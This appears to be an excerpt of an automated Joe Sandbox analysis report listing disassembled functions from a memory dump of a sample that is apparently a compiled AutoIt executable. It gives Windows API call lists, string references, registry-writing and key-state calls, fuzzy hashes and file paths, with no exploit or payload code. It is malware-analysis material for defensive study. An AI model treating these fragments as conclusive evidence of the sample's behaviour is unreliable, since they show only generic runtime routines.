GETCURRENTSELECTION, xrefs: 01046603
SELECTSTRING, xrefs: 01046626
CURRENTTAB, xrefs: 010464DD
SENDCOMMANDID, xrefs: 010467CA
GETSELECTED, xrefs: 010466C1
GETCURRENTCOL, xrefs: 01046724
ISVISIBLE, xrefs: 01046455

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: b49ba0996d624e2977e7ea493d4c3c3a9bb9682c5cba8d5d82243031dcd3770e
Instruction ID: aefa6594c4e676db3f64d0b95f41ec5db0301115f72039c9e86882b25437c7b8
Opcode Fuzzy Hash: b49ba0996d624e2977e7ea493d4c3c3a9bb9682c5cba8d5d82243031dcd3770e
Instruction Fuzzy Hash: 37C196702042458BDB04EF14C990ABE77E5BF95344F04486DF9C69B3B2EB66E90BDB81

Function 0104D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0104D5AE
SetTextColor.GDI32(?,?), ref: 0104D5B2
GetSysColorBrush.USER32(0000000F), ref: 0104D5C8
GetSysColor.USER32(0000000F), ref: 0104D5D3
CreateSolidBrush.GDI32(?), ref: 0104D5D8
GetSysColor.USER32(00000011), ref: 0104D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0104D5FE
SelectObject.GDI32(?,00000000), ref: 0104D60F
SetBkColor.GDI32(?,00000000), ref: 0104D618
SelectObject.GDI32(?,?), ref: 0104D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0104D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0104D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0104D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0104D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0104D6DD
DrawFocusRect.USER32(?,?), ref: 0104D6E8
GetSysColor.USER32(00000011), ref: 0104D6F6
SetTextColor.GDI32(?,00000000), ref: 0104D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0104D712
SelectObject.GDI32(?,0104D2A5), ref: 0104D729
DeleteObject.GDI32(?), ref: 0104D734
SelectObject.GDI32(?,?), ref: 0104D73A
DeleteObject.GDI32(?), ref: 0104D73F
SetTextColor.GDI32(?,?), ref: 0104D745
SetBkColor.GDI32(?,?), ref: 0104D74F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: de4a8f830ff2580b39d56eca535334c3326583e4561d9f4f60daa4f1c6d9ae77
Instruction ID: 55c0201ef56218a55e35136932b475d447d1a9a78df5a95039cf2900ba62fba5
Opcode Fuzzy Hash: de4a8f830ff2580b39d56eca535334c3326583e4561d9f4f60daa4f1c6d9ae77
Instruction Fuzzy Hash: 5C514E71A00208FFDF119FE8DC48AAE7BB9FF08324F114115FA95AB2A1D7759A40CB90

Function 0104B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0104B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0104B7C1
CharNextW.USER32(0000014E), ref: 0104B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0104B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0104B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0104B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0104B875
SetWindowTextW.USER32(?,0000014E), ref: 0104B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0104B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0104B90E
_memset.LIBCMT ref: 0104B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0104B97C
_memset.LIBCMT ref: 0104B9DB
SendMessageW.USER32 ref: 0104BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0104BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0104BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0104BB2C
GetMenuItemInfoW.USER32(?), ref: 0104BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0104BBA3
DrawMenuBar.USER32(?), ref: 0104BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0104BBDA

Strings

0, xrefs: 0104BB4F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 536d7fe23241022707d5e67e20a4c2f284c7a2f7bb94c377e6f6f0cfd5044df2
Instruction ID: 430f8c404d969b56dd91fc91c02dbf647dcd04dc76fa59fa2ea15997fd174408
Opcode Fuzzy Hash: 536d7fe23241022707d5e67e20a4c2f284c7a2f7bb94c377e6f6f0cfd5044df2
Instruction Fuzzy Hash: B1E191B4900219ABEB21DF95CCC4AFE7BB8FF08714F0481A6FA95AA190D775C941CF60

Function 0104764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0104778A
GetDesktopWindow.USER32 ref: 0104779F
GetWindowRect.USER32(00000000), ref: 010477A6
GetWindowLongW.USER32(?,000000F0), ref: 01047808
DestroyWindow.USER32(?), ref: 01047834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0104785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 010478A1
SendMessageW.USER32(?,00000421,?,?), ref: 010478B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 010478C9
IsWindowVisible.USER32(?), ref: 010478E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01047904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01047918
GetWindowRect.USER32(?,?), ref: 01047930
MonitorFromPoint.USER32(?,?,00000002), ref: 01047956
GetMonitorInfoW.USER32 ref: 01047970
CopyRect.USER32(?,?), ref: 01047987
SendMessageW.USER32(?,00000412,00000000), ref: 010479F2

Strings

0, xrefs: 01047735
tooltips_class32, xrefs: 01047856
(, xrefs: 01047965

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 5209ccda6eec46fa8b9da75525a54a54604969d826ee51bd6021896cad556927
Instruction ID: 47efc06b87ec91bbc91633ceb1afa289f97cec1f0601ff95efe345262debaac8
Opcode Fuzzy Hash: 5209ccda6eec46fa8b9da75525a54a54604969d826ee51bd6021896cad556927
Instruction Fuzzy Hash: 8BB1BCB1604341AFD750DF69C984B6ABBE4FF88310F00892DF5D99B292DB75E804CB92

Function 01026CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 01026CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 01026D21
_wcscpy.LIBCMT ref: 01026D4F
_wcscmp.LIBCMT ref: 01026D5A
_wcscat.LIBCMT ref: 01026D70
_wcsstr.LIBCMT ref: 01026D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01026D97
_wcscat.LIBCMT ref: 01026DE0
_wcscat.LIBCMT ref: 01026DE7
_wcsncpy.LIBCMT ref: 01026E12

Strings

StringFileInfo\, xrefs: 01026D6A
\VarFileInfo\Translation, xrefs: 01026D8F
04090000, xrefs: 01026DCD
DefaultLangCodepage, xrefs: 01026DFA
%u.%u.%u.%u, xrefs: 01026E75

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 96df20f6fecb6d6cfb48756ab5005f04a33c2da4072b86f6ba13712a731cadef
Instruction ID: 3c30cfc3e86279606de9b75317e46bf2bb97e502e4a39f0b0615743173d82a79
Opcode Fuzzy Hash: 96df20f6fecb6d6cfb48756ab5005f04a33c2da4072b86f6ba13712a731cadef
Instruction Fuzzy Hash: 36414B7190021A7BFB01BB74DC42EFF77BCEF10610F140069F981AA181EB75D60097A2

Function 00FFA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FFA939
GetSystemMetrics.USER32(00000007), ref: 00FFA941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FFA96C
GetSystemMetrics.USER32(00000008), ref: 00FFA974
GetSystemMetrics.USER32(00000004), ref: 00FFA999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FFA9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00FFA9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FFA9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FFAA0D
GetClientRect.USER32(00000000,000000FF), ref: 00FFAA2B
GetStockObject.GDI32(00000011), ref: 00FFAA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FFAA52

Part of subcall function 00FFB63C: GetCursorPos.USER32(000000FF), ref: 00FFB64F
Part of subcall function 00FFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00FFB66C
Part of subcall function 00FFB63C: GetAsyncKeyState.USER32(00000001), ref: 00FFB691
Part of subcall function 00FFB63C: GetAsyncKeyState.USER32(00000002), ref: 00FFB69F

SetTimer.USER32(00000000,00000000,00000028,00FFAB87), ref: 00FFAA79

Strings

AutoIt v3 GUI, xrefs: 00FFA9F1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: fcb71a527339eb37aa8edce3fd29a6cf29798f2e6c2c6c8161a8d04ddb70f630
Instruction ID: 0be6f971e5306026b300e6bfada52bb24d5676f7e0ef0a1c3e3a6d5a6720ab4e
Opcode Fuzzy Hash: fcb71a527339eb37aa8edce3fd29a6cf29798f2e6c2c6c8161a8d04ddb70f630
Instruction Fuzzy Hash: 69B18071A0020ADFDB24DFA8C845BAE7BB4FF08314F154219FA95E72A4DB79E840DB51

Function 00FE2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FE2F7A
IsWindow.USER32(?), ref: 010522FD

Strings

LAST, xrefs: 010520B6
ACTIVE, xrefs: 010520CC
HANDLE, xrefs: 010520E2
CLASS, xrefs: 01052128
REGEXPCLASS, xrefs: 01052149
TITLE, xrefs: 01052292
ALL, xrefs: 01052264
INSTANCE, xrefs: 0105223C
REGEXPTITLE, xrefs: 010520F8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 0a52fae31ef14ab7218b9514a4564e9a58fec058a3de55e584e266828837264f
Instruction ID: 656262f23dbbc062b7cb0c72a5d30c620a7b95373a8db03bd0ab108500546c32
Opcode Fuzzy Hash: 0a52fae31ef14ab7218b9514a4564e9a58fec058a3de55e584e266828837264f
Instruction Fuzzy Hash: 74D1F630108286EBDB44EF55CC80AABBBF4BF54340F004A59F9D6531A2DB74E99ADB91

Function 01043639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01043735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0107DC00,00000000,?,00000000,?,?), ref: 010437A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 010437EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01043874
RegCloseKey.ADVAPI32(?), ref: 01043B94
RegCloseKey.ADVAPI32(00000000), ref: 01043BA1

Strings

REG_MULTI_SZ, xrefs: 0104395C
REG_BINARY, xrefs: 01043B2F
REG_SZ, xrefs: 010438B2
REG_EXPAND_SZ, xrefs: 01043811
REG_DWORD, xrefs: 01043A65
REG_QWORD, xrefs: 01043AE2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 4a143bc4b87be8eabb768704098465a549342e733494025c2d2d1e6125210454
Instruction ID: becc001c5b497d7231b6a66d64044d8f3993bc38713174138b60b7f1c71dd391
Opcode Fuzzy Hash: 4a143bc4b87be8eabb768704098465a549342e733494025c2d2d1e6125210454
Instruction Fuzzy Hash: 25026D752046119FDB14EF19C894A2EB7E5FF88720F04846DF9999B3A1CB74ED01CB91

Function 01046BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01046C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01046D16

Strings

FINDITEM, xrefs: 01046E81
SELECTALL, xrefs: 01046D75
SELECT, xrefs: 01046DA8
GETSELECTEDCOUNT, xrefs: 01046CF9
SELECTCLEAR, xrefs: 01046D8D
DESELECT, xrefs: 01046DFC
VIEWCHANGE, xrefs: 01046ECD
GETITEMCOUNT, xrefs: 01046C84
GETTEXT, xrefs: 01046CBF
ISSELECTED, xrefs: 01046D21
SELECTINVERT, xrefs: 01046DDE
GETSELECTED, xrefs: 01046E3C
GETSUBITEMCOUNT, xrefs: 01046CA1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 259f1d32b0e467f68e5035fe4fccbace2f6d87291808c039cac1f56813cde7f7
Instruction ID: 61022c3568d2e42cf75c1079b05705e030c7c9f2fec188f7030911ed71d541e9
Opcode Fuzzy Hash: 259f1d32b0e467f68e5035fe4fccbace2f6d87291808c039cac1f56813cde7f7
Instruction Fuzzy Hash: E0A1AC702042859BCB14EF25CD91A7EB7E5BF85310F004868B9E69B3E2EB75EC06DB41

Function 0101CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0101CF91
__swprintf.LIBCMT ref: 0101D032
_wcscmp.LIBCMT ref: 0101D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0101D09A
_wcscmp.LIBCMT ref: 0101D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0101D10D
GetDlgCtrlID.USER32(?), ref: 0101D15F
GetWindowRect.USER32(?,?), ref: 0101D195
GetParent.USER32(?), ref: 0101D1B3
ScreenToClient.USER32(00000000), ref: 0101D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0101D234
_wcscmp.LIBCMT ref: 0101D248
GetWindowTextW.USER32(?,?,00000400), ref: 0101D26E
_wcscmp.LIBCMT ref: 0101D282

Strings

%s%u, xrefs: 0101D02C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: ba2d66fe5ceca04ff9527f72adf4f227e516cae68ade18c21b28e69c619c37dd
Instruction ID: b159cbf8b07eb59bed2d3fd4befcba14ca1822a94529f2df35b3219d54fbcf1a
Opcode Fuzzy Hash: ba2d66fe5ceca04ff9527f72adf4f227e516cae68ade18c21b28e69c619c37dd
Instruction Fuzzy Hash: BDA1C131604306ABD716DFA8C888FEAB7E8FF58354F004519FAE9D2194D738EA45CB91

Function 0101D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0101D8EB
_wcscmp.LIBCMT ref: 0101D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0101D924
CharUpperBuffW.USER32(?,00000000), ref: 0101D941
_wcscmp.LIBCMT ref: 0101D95F
_wcsstr.LIBCMT ref: 0101D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0101D9A8
_wcscmp.LIBCMT ref: 0101D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0101D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0101DA28
_wcscmp.LIBCMT ref: 0101DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0101DA60
GetWindowRect.USER32(00000004,?), ref: 0101DAC9

Strings

ThumbnailClass, xrefs: 0101D9B3, 0101DA33
@, xrefs: 0101D8C6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 0472647501ec549288b4a1ff4023fc656aee498c19c42043212e32a796c83e7c
Instruction ID: 98a50a6f7234216c3c29e6b0e35e5cdf93ae18b43b4c82271f25cb15f244fc31
Opcode Fuzzy Hash: 0472647501ec549288b4a1ff4023fc656aee498c19c42043212e32a796c83e7c
Instruction Fuzzy Hash: A281EA311083459FEB15DF98C888FAA7BD9FF44314F0444AAFDCA9A09AD738D945CBA1

Function 0101D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0101D753

Strings

LAST, xrefs: 0101D718
ACTIVE, xrefs: 0101D72E
HANDLE=, xrefs: 0101D74C
[LAST, xrefs: 0101D800
CLASSNAME=, xrefs: 0101D790
[CLASS:, xrefs: 0101D7A3
ALL, xrefs: 0101D7E7
[ACTIVE, xrefs: 0101D740
[ALL, xrefs: 0101D7F9
[REGEXPTITLE:, xrefs: 0101D77B
[HANDLE:, xrefs: 0101D75F
REGEXP=, xrefs: 0101D768

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 2ff945989ecd4e8a6bc834d825cc76b8686c2635f2f3d64e4d4c1a67139aeaf7
Instruction ID: 97050ef1454b6ae784e1869270bb40f263e48cc48d3a754b4d2455b882eff257
Opcode Fuzzy Hash: 2ff945989ecd4e8a6bc834d825cc76b8686c2635f2f3d64e4d4c1a67139aeaf7
Instruction Fuzzy Hash: 1E31C331A44289B6EB05FA96CD67EED73A45F20740F20006DF4C1B50D9FB59AB04E791

Function 0101EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0101EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0101EAC2
SetWindowTextW.USER32(?,?), ref: 0101EAD9
GetDlgItem.USER32(?,000003EA), ref: 0101EAEE
SetWindowTextW.USER32(00000000,?), ref: 0101EAF4
GetDlgItem.USER32(?,000003E9), ref: 0101EB04
SetWindowTextW.USER32(00000000,?), ref: 0101EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0101EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0101EB45
GetWindowRect.USER32(?,?), ref: 0101EB4E
SetWindowTextW.USER32(?,?), ref: 0101EBB9
GetDesktopWindow.USER32 ref: 0101EBBF
GetWindowRect.USER32(00000000), ref: 0101EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0101EC12
GetClientRect.USER32(?,?), ref: 0101EC1F
